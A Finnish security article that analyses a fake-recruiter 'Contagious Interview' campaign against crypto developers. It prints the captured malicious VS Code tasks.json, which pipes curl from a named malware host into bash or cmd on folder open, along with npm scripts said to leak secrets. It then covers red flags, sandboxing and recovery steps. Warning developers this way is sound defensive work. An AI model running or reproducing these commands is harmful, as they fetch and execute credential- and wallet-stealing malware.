Tarttuva Haastattelu: Kuinka valerekrytoijat hakkeroivat kehittäjiä
Tiivistelmä: Uusi valtioiden sponsoroimien hyökkäysten aalto iskee krypton parhaiten kehittäjiin. Huijarit esiintyvät rekrytoijina tai teknologiajohtajina ja pakottavat hakijat avaamaan haitallista koodia. Tämä artikkeli analysoi tapauksen "Martin Erazo", VS Code "tasks.json" -hyökkäyksen ja välttämättömän "Polttoprotokollan" (Burn Protocol) selviytymiseen.
Vastuuvapauslauseke: Tämä artikkeli raportoi kyberturvallisuustapauksista, joissa esiinnytään oikeina henkilöinä. Nimet "Martin Erazo" ja "Ara Vartanian" viittaavat hyökkääjien käyttämiin persooniin. Uskomme, että näiden nimien takana olevat todelliset henkilöt ovat syyttömiä identiteettivarkauden uhreja.
1. Täydellinen Uhri: "Martin Erazo" -persoona
Se alkaa viestillä, joka painaa kokeneen kehittäjän oikeita nappeja:
- Rooli: CTO / Lead Architect
- Budjetti: 6 miljoonan dollarin rahoitus varmistettu
- Teknologia: Web3, AI, Hajautettu Infra
Äskettäin vahvistetussa hyökkäyksessä rekrytoija nimeltä "Martin Erazo" otti yhteyttä LinkedInin kautta. Profiili käytti oikean teatteriohjaajan nimeä ja kuvaa, mutta työhistoria oli väärennetty ja vaihtui yhtäkkiä "IT-projektinhallintaan" vuonna 2025 – klassinen merkki kapatusta tai ostetusta tilistä.
Huijaus etenee nopeasti. He ohittavat normaalin HR-seulonnan ja siirtyvät suoraan "Tekniseen Haastatteluun" johtajan kanssa – tässä tapauksessa jäljitelmä oikeasta alan CTO:sta, Ara Vartanianista (nykyään Limit Breakilla).
Punainen Lippu: Projektien nimet vaihtuvat jatkuvasti. Rekrytoija myy "Betfiniä" (GameFi-alusta), mutta lähetetty esitys koskee "SpaceXView'ta" (Metaverse-projekti). Tämä epäjohdonmukaisuus on vihje siitä, että huijarit kierrättävät materiaaleja kampanjoiden välillä.
2. Ansa: "Voitko tarkistaa MVP-koodimme?"
Väärennetty "CTO" väittää tarvitsevansa asiantuntevaa silmääsi tarkistamaan heidän MVP (Minimum Viable Product) -koodinsa. He lähettävät GitHub-repo-linkin tai ZIP-tiedoston ja painostavat sinua avaamaan sen haastattelun aikana tai heti sen jälkeen.
Tässä hakkerointi tapahtuu.
He käyttävät hyväkseen auttamishaluasi ja egoasi. Luulet etsiväsi bugia React-komponentista. Todellisuudessa "bugi" on "ominaisuus", joka on suunniteltu varastamaan säästösi.
3. Tekninen Soluttautuminen: Zero-Click Malware
Hyökkääjät käyttävät "nollan klikkauksen" tai "vähäisen klikkauksen" haavoittuvuuksia, jotka kohdistuvat kehittäjätyökaluihin. Heidän ei tarvitse, että suoritat sovelluksen; riittää, että avaat kansion.
Ase: .vscode/tasks.json
Tässä nimenomaisessa tapauksessa repo sisälsi miinoitetun .vscode/tasks.json -tiedoston. Tämä tiedosto kertoo VS Codelle, miten projekti rakennetaan.
Haitallinen Koodi:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Tämä on laukaisin. Heti kun avaat kansion VS Codessa, tämä tehtävä suoritetaan automaattisesti.
- Payload: Se käyttää curlia ladatakseen skriptin osoitteesta
vscodesettingtask.vercel.app– tunnettu haittaohjelmien isäntä, joka on naamioitu asetus-APIksi. - Tulos: Skripti toimii muistissa ja varastaa välittömästi Chrome-salasanat, istuntoevästeet ja SSH-avaimet.
Suunnitelma B: package.json scripts
Jos VS Code -hakkerointi epäonnistuu, heillä on npm-skriptit:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
npm install tai npm start käynnistäminen laukaisee server/server.js -tiedoston – paikallisen C2 (Command and Control) -skriptin, joka vuotaa ympäristömuuttujasi (AWS-avaimet, lompakon siemenet) hyökkääjälle.
4. Punaiset Liput vs Vihreät Liput
Kuinka havaita se ennen kuin on liian myöhäistä?
Jos olet kehittäjä, "Yksityiset Repot" tai ZIP-tiedostot pitäisi laukaista hälytykset. Lailliset yritykset käyttävät Julkisia Repoja tai standardoituja testausalustoja.
Varoitus: Tämä ei ole ainoa tapa hyökätä kehittäjiä vastaan. Lue Yhteistyökumppanin Ansasta Discordissa ja kuinka Toimitusketjuhyökkäykset tekevät riippuvuuksista vaarallisia.
| 🚩 Punainen Lippu (Juokse) | ✅ Vihreä Lippu (Turvallinen) |
|---|---|
| Koodi Ensin: Lähettää koodia ennen työtarjousta | Vakioprosessi: Haastattelu ensin, koodi sitten |
| Rikkinäinen Identiteetti: Rekrytoijalla merkityksetön tausta (esim. Taiteilija -> IT-päällikkö) | Vahvistettu Historia: LinkedIn-ura on johdonmukainen |
| Ristiriita: Projektien nimet eivät täsmää (Betfin vs SpaceXView) | Johdonmukaisuus: Nimi, dokumentaatio ja verkkosivusto täsmäävät |
| Kiireellisyys: "CTO odottaa", "avaa nyt" | Kärsivällisyys: He kunnioittavat aikaasi ja aikatauluasi |
| Henkilökohtainen Sähköposti: [email protected] | Yrityssähköposti: [email protected] (toimivilla MX-tietueilla) |
5. Turvallisuusprotokolla: Kuinka haastatella turvallisesti
Jos olet Senior Dev, sinua tullaan metsästämään. Ympäristön kovettaminen on pakollista.
Protokolla 1: "Burner" -ympäristö
Älä KOSKAAN käytä päätyöasemaasi kooditesteihin.
- Virtuaalikoneet: Käytä VirtualBoxia tai VMWarea.
- Cloud Dev -ympäristöt: Käytä GitHub Codespacesia tai Gitpodia. Nämä ovat lyhytikäisiä ja eristettyjä paikallisista lompakkotiedostoistasi.
Protokolla 2: Forensinen Auditointi
Ennen kuin avaat tuntematonta koodia:
- Tarkista .vscode/tasks.json: Etsi
runOn: folderOpen. - Tarkista package.json: Etsi epäilyttäviä preinstall- tai postinstall-skriptejä.
- Hakusanat: käytä grepiä sanoille
curl,wget,os.homedir(),.ssh,wallet.
Protokolla 3: VS Code Kovettaminen
Poista "Workspace Trust" käytöstä maailmanlaajuisesti.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
- Tämä pakottaa VS Coden kysymään lupaa ennen kansion tason tehtävien suorittamista.
6. Ratkaisu: "Burn Protocol"
Jos olet avannut haitallisen Repon (kuten "Martin Erazo" -persoonan lähettämä), oleta, että sinut on hakkeroitu. Palautus ei riitä.
- Katkaise Yhteys: Irrota verkkokaapeli välittömästi.
- Polta Lompakko: Yksityiset avaimesi on vuodettu. Luo uudet lompakot puhtaalla laitteella (puhelin) ja siirrä jäljellä olevat varat. Älä koskaan käytä vanhaa seediä.
- Tapa Istunnot: Kirjaudu ulos kaikista istunnoista Google, GitHub, AWS. Mitätöi aktiiviset tokenit.
- SSH Avain Audit: Tarkista GitHub/GitLab-asetukset. Hyökkääjät lisäävät usein omat SSH-avaimensa säilyttääkseen takaoven. Poista ne, joita et tunnista.
- Nuke It: Pyyhi levy ja asenna käyttöjärjestelmä uudelleen. Tämä on ainoa tapa olla 100% varma, että Rootkitit ovat poissa.
Johtopäätös
"Tarttuva Haastattelu" -huijaus käyttää omaa asiantuntemustasi sinua vastaan. Se kohdistuu haluusi ratkaista ongelmia. Mutta Web3:ssa vainoharhaisuus on ammatillinen hyve. Vahvista jokainen identiteetti, hiekkalaatikoi jokainen repo, äläkä koskaan luota "rekrytoijaan", jolla on kiire saada sinut ajamaan koodia.
Aiheeseen liittyvät artikkelit
Supply Chain Poison: Kun luotetut päivitykset muuttuvat haittaohjelmiksi
Et ladannut mitään outoa. Päivitit vain Ledger-sovelluksen... Ja silloin rahat katosivat. Toimitusketjuhyökkäyksen kauhu.
Paperikilpi (The Paper Shield): Kuinka varmuuskopioida Seed Phrase oikein
Kuvakaappaukset ovat katastrofaalisia. Pilvi on jonkun muun tietokone. Ainoa tapa säilyttää yksityiset avaimesi on 'Teräs' ja 'Paperi'.
The Long Con: 'Pig Butchering' -huijauksen psykologia
Hän ei lähettänyt viestiä väärään numeroon. Eikä hän ole rakastunut sinuun. Sukellus 'Sha Zhu Paniin', kryptovaluuttojen julmimpaan huijaukseen, ja kuinka tunnistat käsikirjoituksen.